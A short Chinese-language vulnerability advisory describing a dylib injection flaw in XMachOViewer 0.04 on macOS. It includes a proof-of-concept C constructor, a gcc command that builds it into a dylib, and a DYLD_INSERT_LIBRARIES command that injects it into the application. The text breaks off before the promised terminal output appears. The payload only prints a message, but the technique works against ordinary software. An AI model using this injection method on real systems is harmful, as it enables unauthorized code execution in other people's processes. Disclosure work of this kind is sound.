XMachOViewer 0.04 中存在一个 dylib 注入漏洞,攻击者可借此破坏完整性。通过利用该漏洞,攻击者能够将未经授权的代码注入产品进程,进而可能导致远程控制以及对敏感用户数据的未授权访问。

适用于 macOS 的便携版
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
编译
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
然后进行注入:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
这将打开应用程序并运行 dylib。关闭应用程序后,我们便可在终端中看到:
